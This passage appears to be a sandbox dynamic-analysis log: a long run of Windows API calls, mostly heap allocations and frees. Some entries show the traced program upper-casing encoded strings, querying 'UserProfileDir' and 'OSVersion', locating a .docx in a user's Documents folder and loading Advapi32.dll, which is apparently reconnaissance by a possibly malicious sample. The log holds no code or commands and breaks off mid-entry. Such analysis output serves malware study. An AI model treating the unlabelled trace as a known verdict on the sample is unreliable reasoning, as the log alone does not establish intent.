HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.205] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.205] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0265.205] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0265.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.206] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0265.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.206] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0265.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MzqysNw1q1np8jj.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d8a540, ftCreationTime.dwHighDateTime=0x1d49d63, ftLastAccessTime.dwLowDateTime=0x61144ac0, ftLastAccessTime.dwHighDateTime=0x1d4d565, ftLastWriteTime.dwLowDateTime=0x61144ac0, ftLastWriteTime.dwHighDateTime=0x1d4d565, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0xb450047, dwReserved1=0x27d7a, cFileName="MzqysNw1q1np8jj.docx", cAlternateFileName="MZQYSN~1.DOC")) returned 0xaa5660 [0265.207] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0265.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.208] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.208] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.208] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.208] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.209] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.209] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.209] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.209] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.210] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.211] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.212] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.212] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.212] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.213] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.214] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.214] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.216] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.217] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: 